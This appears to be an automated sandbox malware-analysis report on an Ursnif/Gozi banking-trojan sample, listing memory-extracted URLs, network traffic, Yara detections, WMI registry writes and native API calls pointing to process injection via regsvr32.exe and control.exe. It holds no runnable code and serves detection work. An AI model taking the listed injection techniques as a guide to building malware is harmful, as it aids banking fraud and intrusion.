Source: ~DFD10CE9AADA4C4DBB.TMP.3.dr	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1
Source: 55a804ab-e5c6-4b97-9319-86263d365d28[1].json.5.dr	String found in binary or memory: https://geolocation.onetrust.com/cookieconsentpub/v1/geo/location
Source: powershell.exe, 00000021.00000002.473644124.000001F93BE0D000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://i.geistm.com/l/HFCH_DTS_LP?bcid=5e875ab70e43d27d2b9a8191&bhid=5f624df5866933554eb1ec8b&a
Source: auction[1].htm.5.dr	String found in binary or memory: https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ce_sharpen%2Ch_311%2Cw_207%2Cc_fill%
Source: auction[1].htm.5.dr	String found in binary or memory: https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://itunes.apple.com/ch/app/microsoft-news/id945416273?pt=80423&ct=prime_footer&mt=8
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://linkmaker.itunes.apple.com/assets/shared/badges/de-de/appstore-lrg.svg"
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=13&checkda=1&ct=1613420858&rver
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=13&ct=1613420858&rver=7.0.6730.0&am
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://login.live.com/logout.srf?ct=1613420859&rver=7.0.6730.0&lc=1033&id=1184&lru=
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://login.live.com/me.srf?wa=wsignin1.0&rpsnv=13&ct=1613420858&rver=7.0.6730.0&w
Source: 85-0f8009-68ddb2ab[1].js.5.dr	String found in binary or memory: https://login.skype.com/login/oauth/microsoft?client_id=738133
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://mem.gfx.ms/meversion/?partner=msn&market=de-ch"
Source: 85-0f8009-68ddb2ab[1].js.5.dr	String found in binary or memory: https://office.live.com/start/Excel.aspx?WT.mc_id=MSN_site;Sway
Source: 85-0f8009-68ddb2ab[1].js.5.dr	String found in binary or memory: https://office.live.com/start/PowerPoint.aspx?WT.mc_id=MSN_site
Source: 85-0f8009-68ddb2ab[1].js.5.dr	String found in binary or memory: https://office.live.com/start/Word.aspx?WT.mc_id=MSN_site;Excel
Source: 85-0f8009-68ddb2ab[1].js.5.dr	String found in binary or memory: https://onedrive.live.com/#qt=mru
Source: 85-0f8009-68ddb2ab[1].js.5.dr	String found in binary or memory: https://onedrive.live.com/?qt=allmyphotos;Aktuelle
Source: 85-0f8009-68ddb2ab[1].js.5.dr	String found in binary or memory: https://onedrive.live.com/?qt=mru;Aktuelle
Source: 85-0f8009-68ddb2ab[1].js.5.dr	String found in binary or memory: https://onedrive.live.com/?qt=mru;OneDrive-App
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://onedrive.live.com/?wt.mc_id=oo_msn_msnhomepage_header
Source: 85-0f8009-68ddb2ab[1].js.5.dr	String found in binary or memory: https://onedrive.live.com/about/en/download/
Source: 85-0f8009-68ddb2ab[1].js.5.dr	String found in binary or memory: https://onedrive.live.com;Fotos
Source: 85-0f8009-68ddb2ab[1].js.5.dr	String found in binary or memory: https://onedrive.live.com;OneDrive-App
Source: 85-0f8009-68ddb2ab[1].js.5.dr	String found in binary or memory: https://onedrive.live.com?wt.mc_id=oo_msn_msnhomepage_header
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://outlook.com/
Source: 85-0f8009-68ddb2ab[1].js.5.dr	String found in binary or memory: https://outlook.live.com/calendar
Source: 85-0f8009-68ddb2ab[1].js.5.dr	String found in binary or memory: https://outlook.live.com/mail/deeplink/compose;Kalender
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://play.google.com/intl/en_us/badges/images/generic/de_badge_web_generic.png"
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://play.google.com/store/apps/details?id=com.microsoft.amp.apps.bingnews&hl=de-ch&refer
Source: ~DFD10CE9AADA4C4DBB.TMP.3.dr	String found in binary or memory: https://res-a.akamaihd.net/__media__/pics/8000/72/941/fallback1.jpg
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://rover.ebay.com/rover/1/5222-53480-19255-0/1?mpre=https%3A%2F%2Fwww.ebay.ch&campid=533862
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://sp.booking.com/index.html?aid=1589774&label=dech-prime-hp-me
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://sp.booking.com/index.html?aid=1589774&label=dech-prime-hp-shoppingstripe-nav
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://sp.booking.com/index.html?aid=1589774&label=travelnavlink
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/de-ch/homepage/api/modules/cdnfetch"
Source: imagestore.dat.3.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/sc/c6/519670.jpg
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB12jAN6.img?h=27&
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1cEP3G.img?h=27&
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1cG73h.img?h=27&
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1dHqH1.img?h=368&amp
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBPfCZL.img?h=27&w
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBX2afX.img?h=27&w
Source: 85-0f8009-68ddb2ab[1].js.5.dr	String found in binary or memory: https://support.skype.com
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://twitter.com/
Source: 85-0f8009-68ddb2ab[1].js.5.dr	String found in binary or memory: https://twitter.com/i/notifications;Ich
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://web.vortex.data.msn.com/collect/v1/t.gif?name=%27Ms.Webi.PageView%27&ver=%272.1%27&a
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://www.awin1.com/cread.php?awinmid=11518&awinaffid=696593&clickref=dech-edge-dhp-infopa
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://www.awin1.com/cread.php?awinmid=15168&awinaffid=696593&clickref=de-ch-edge-dhp-river
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://www.awin1.com/cread.php?awinmid=15168&awinaffid=696593&clickref=de-ch-ss&ued=htt
Source: iab2Data[1].json.5.dr	String found in binary or memory: https://www.bidstack.com/privacy-policy/
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://www.msn.com/de-ch
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://www.msn.com/de-ch/
Source: ~DFD10CE9AADA4C4DBB.TMP.3.dr	String found in binary or memory: https://www.msn.com/de-ch/?ocid=iehp
Source: ~DFD10CE9AADA4C4DBB.TMP.3.dr	String found in binary or memory: https://www.msn.com/de-ch/?ocid=iehp$
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://www.msn.com/de-ch/?ocid=iehp&item=deferred_page%3a1&ignorejs=webcore%2fmodules%2fjsb
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://www.msn.com/de-ch/homepage/api/modules/fetch"
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://www.msn.com/de-ch/homepage/api/pdp/updatepdpdata"
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://www.msn.com/de-ch/nachrichten/coronareisen
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://www.msn.com/de-ch/nachrichten/politik/der-spaziergang-kam-nicht-weit/ar-BB1dEdnO?ocid=hploca
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://www.msn.com/de-ch/nachrichten/politik/interview-haben-sie-angst-dass-jeder-der-eine-polizeim
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://www.msn.com/de-ch/nachrichten/regional
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://www.msn.com/de-ch/news/other/40-000-franken-f%c3%bcr-quartier-projekte-in-wipkingen/ar-BB1dH
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://www.msn.com/de-ch/news/other/der-fcz-gewinnt-%c3%a0-la-rizzo/ar-BB1dG2Q3?ocid=hplocalnews
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://www.msn.com/de-ch/news/other/finanzdirektion-lehnt-%c3%bcberraschend-viele-h%c3%a4rtefallges
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://www.msn.com/de-ch/news/other/interview-sicherheitsdirektor-mario-fehr-90-prozent-der-abgewie
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://www.msn.com/de-ch/news/other/observierung-polizei-news-schulen-wohnungen-dar%c3%bcber-stimmt
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://www.msn.com/de-ch/news/other/robin-leone-st%c3%bcrmt-wieder-f%c3%bcr-kloten/ar-BB1dHHnA?ocid
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://www.msn.com/de-ch/news/other/verst%c3%b6sst-die-nationalit%c3%a4ten-initiative-der-svp-gegen
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://www.msn.com/de-ch/news/other/wo-die-liebe-wohnt/ar-BB1dFEAE?ocid=hplocalnews
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://www.msn.com?form=MY01O4&OCID=MY01O4
Source: 85-0f8009-68ddb2ab[1].js.5.dr	String found in binary or memory: https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_QuickNote&auth=1
Source: 85-0f8009-68ddb2ab[1].js.5.dr	String found in binary or memory: https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_Recent&auth=1&wdorigin=msn
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_TopMenu&auth=1&wdorigin=msn
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://www.ricardo.ch/?utm_source=msn&utm_medium=affiliate&utm_campaign=msn_mestripe_logo_d
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://www.ricardo.ch/?utm_source=msn&utm_medium=affiliate&utm_campaign=msn_shop_de&utm
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://www.skype.com/
Source: 85-0f8009-68ddb2ab[1].js.5.dr	String found in binary or memory: https://www.skype.com/de
Source: 85-0f8009-68ddb2ab[1].js.5.dr	String found in binary or memory: https://www.skype.com/de/download-skype
Source: 85-0f8009-68ddb2ab[1].js.5.dr	String found in binary or memory: https://www.skype.com/go/onedrivepromo.download?cm_mmc=MSFT_2390_MSN-com
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://www.skyscanner.net/flights?associateid=API_B2B_19305_00001&vertical=custom&pageType=
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://www.skyscanner.net/g/referrals/v1/cars/home?associateid=API_B2B_19305_00002
Source: iab2Data[1].json.5.dr	String found in binary or memory: https://www.stroeer.com/fileadmin/com/StroeerDSP_deviceStorage.json
Source: iab2Data[1].json.5.dr	String found in binary or memory: https://www.stroeer.de/fileadmin/de/Konvergenz_und_Konzepte/Daten_und_Technologien/Stroeer_SSP/Downl
Source: 85-0f8009-68ddb2ab[1].js.5.dr	String found in binary or memory: https://www.sway.com/?WT.mc_id=MSN_site&utm_source=MSN&utm_medium=Topnav&utm_campaign=link;PowerPoin

Uses HTTPS

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745

Uses secure TLS version for HTTPS connections

Source: unknown	HTTPS traffic detected: 104.20.184.68:443 -> 192.168.2.3:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.20.184.68:443 -> 192.168.2.3:49729 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.3:49746 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.3:49744 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.3:49742 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.3:49745 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.3:49743 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.3:49747 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif

Source: Yara match	File source: 00000001.00000003.336276523.0000000005248000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.420376736.000001A5E0F30000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.336080557.0000000005248000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.336180979.0000000005248000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.336303683.0000000005248000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.343871778.00000000050CB000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000003.428480646.000001F9546C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.455040534.00000000042F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000002.464915515.0000000000DEE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.336209770.0000000005248000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.336248371.0000000005248000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.406882710.0000000004330000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.336157909.0000000005248000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.336112691.0000000005248000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: control.exe PID: 2156, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 3732, type: MEMORY
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 6708, type: MEMORY

E-Banking Fraud:

Yara detected Ursnif

Source: Yara match	File source: 00000001.00000003.336276523.0000000005248000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.420376736.000001A5E0F30000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.336080557.0000000005248000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.336180979.0000000005248000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.336303683.0000000005248000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.343871778.00000000050CB000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000003.428480646.000001F9546C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.455040534.00000000042F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000002.464915515.0000000000DEE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.336209770.0000000005248000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.336248371.0000000005248000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.406882710.0000000004330000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.336157909.0000000005248000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.336112691.0000000005248000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: control.exe PID: 2156, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 3732, type: MEMORY
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 6708, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)

Source: 00000026.00000003.420376736.000001A5E0F30000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Win32.Gozi Author: CCN-CERT
Source: 00000021.00000003.428480646.000001F9546C0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Win32.Gozi Author: CCN-CERT
Source: 00000026.00000002.464915515.0000000000DEE000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Win32.Gozi Author: CCN-CERT

Writes or reads registry keys via WMI

Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Writes registry values via WMI

Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Contains functionality to call native functions

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_008F34D0 NtMapViewOfSection,		1_2_008F34D0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_008F11A9 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,		1_2_008F11A9
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_008F4F73 GetProcAddress,NtCreateSection,memset,		1_2_008F4F73
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_008FB159 NtQueryVirtualMemory,		1_2_008FB159
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_04315868 memcpy,memcpy,memcpy,NtUnmapViewOfSection,NtClose,memset,		1_2_04315868
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_042FCCD9 RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA,		1_2_042FCCD9
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_042FE529 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread,		1_2_042FE529
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_04300D8D memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64,		1_2_04300D8D
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_04305E21 GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA,		1_2_04305E21
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_04312AAC NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64,		1_2_04312AAC
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_042F5E8A NtQueryInformationProcess,		1_2_042F5E8A
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_0430C6FE NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,		1_2_0430C6FE
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_042FF314 NtWriteVirtualMemory,NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError,		1_2_042FF314
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_042F8F6D NtAllocateVirtualMemory,NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError,		1_2_042F8F6D
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_042F77B0 NtMapViewOfSection,		1_2_042F77B0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_0430FFF2 GetProcAddress,NtCreateSection,memset,		1_2_0430FFF2
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_042FA818 NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW,		1_2_042FA818
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_042F3934 OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle,		1_2_042F3934
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_04304518 NtGetContextThread,RtlNtStatusToDosError,		1_2_04304518
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_043005FC NtQueryInformationThread,GetLastError,RtlNtStatusToDosError,		1_2_043005FC
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_04312E10 NtQuerySystemInformation,RtlNtStatusToDosError,		1_2_04312E10
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_042F2A0A NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError,		1_2_042F2A0A
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_042FE6C4 memset,NtQueryInformationProcess,		1_2_042FE6C4
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_043017CD memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError,		1_2_043017CD
Source: C:\Windows\System32\control.exe	Code function: 38_2_00DDF9A4 NtAllocateVirtualMemory,		38_2_00DDF9A4
Source: C:\Windows\System32\control.exe	Code function: 38_2_00DDC130 NtWriteVirtualMemory,		38_2_00DDC130
Source: C:\Windows\System32\control.exe	Code function: 38_2_00DC1A9C NtQueryInformationProcess,		38_2_00DC1A9C
Source: C:\Windows\System32\control.exe	Code function: 38_2_00DC2BD8 NtSetInformationProcess,CreateRemoteThread,ResumeThread,FindCloseChangeNotification,		38_2_00DC2BD8
Source: C:\Windows\System32\control.exe	Code function: 38_2_00DD9B4C NtQueryInformationProcess,		38_2_00DD9B4C
Source: C:\Windows\System32\control.exe	Code function: 38_2_00DBC458 RtlAllocateHeap,NtSetContextThread,NtUnmapViewOfSection,NtClose,		38_2_00DBC458
Source: C:\Windows\System32\control.exe	Code function: 38_2_00DD9584 NtReadVirtualMemory,		38_2_00DD9584
Source: C:\Windows\System32\control.exe	Code function: 38_2_00DD1EEC NtCreateSection,		38_2_00DD1EEC
Source: C:\Windows\System32\control.exe	Code function: 38_2_00DBF640 NtQueryInformationToken,NtQueryInformationToken,NtClose,		38_2_00DBF640
Source: C:\Windows\System32\control.exe	Code function: 38_2_00DCEF14 NtMapViewOfSection,		38_2_00DCEF14
Source: C:\Windows\System32\control.exe	Code function: 38_2_00DF1002 NtProtectVirtualMemory,NtProtectVirtualMemory,		38_2_00DF1002

Contains functionality to launch a process as a different user

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 1_2_042F2410 CreateProcessAsUserW,

1_2_042F2410

Detected potential crypto function

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_008F28E9		1_2_008F28E9
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_008FAF34		1_2_008FAF34
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_04304804		1_2_04304804
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_0431086C		1_2_0431086C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_04313C5C		1_2_04313C5C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_0430BC93		1_2_0430BC93
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_04302678		1_2_04302678
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_04311669		1_2_04311669
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_042FC307		1_2_042FC307
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_042FBBA1		1_2_042FBBA1
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_0430CFA3		1_2_0430CFA3
Source: C:\Windows\System32\control.exe	Code function: 38_2_00DC5890		38_2_00DC5890
Source: C:\Windows\System32\control.exe	Code function: 38_2_00DC6B80		38_2_00DC6B80
Source: C:\Windows\System32\control.exe	Code function: 38_2_00DBC458		38_2_00DBC458
Source: C:\Windows\System32\control.exe	Code function: 38_2_00DB78F0		38_2_00DB78F0
Source: C:\Windows\System32\control.exe	Code function: 38_2_00DDE09C		38_2_00DDE09C
Source: C:\Windows\System32\control.exe	Code function: 38_2_00DC2854		38_2_00DC2854
Source: C:\Windows\System32\control.exe	Code function: 38_2_00DC206C		38_2_00DC206C
Source: C:\Windows\System32\control.exe	Code function: 38_2_00DC386C		38_2_00DC386C
Source: C:\Windows\System32\control.exe	Code function: 38_2_00DCE808		38_2_00DCE808
Source: C:\Windows\System32\control.exe	Code function: 38_2_00DDE038		38_2_00DDE038
Source: C:\Windows\System32\control.exe	Code function: 38_2_00DC11DC		38_2_00DC11DC
Source: C:\Windows\System32\control.exe	Code function: 38_2_00DB49BC		38_2_00DB49BC
Source: C:\Windows\System32\control.exe	Code function: 38_2_00DCAACC		38_2_00DCAACC
Source: C:\Windows\System32\control.exe	Code function: 38_2_00DB42CC		38_2_00DB42CC
Source: C:\Windows\System32\control.exe	Code function: 38_2_00DD0294		38_2_00DD0294
Source: C:\Windows\System32\control.exe	Code function: 38_2_00DDFA10		38_2_00DDFA10
Source: C:\Windows\System32\control.exe	Code function: 38_2_00DD6A28		38_2_00DD6A28
Source: C:\Windows\System32\control.exe	Code function: 38_2_00DD2BD8		38_2_00DD2BD8
Source: C:\Windows\System32\control.exe	Code function: 38_2_00DD53D4		38_2_00DD53D4
Source: C:\Windows\System32\control.exe	Code function: 38_2_00DBEBD0		38_2_00DBEBD0
Source: C:\Windows\System32\control.exe	Code function: 38_2_00DC3BF4		38_2_00DC3BF4
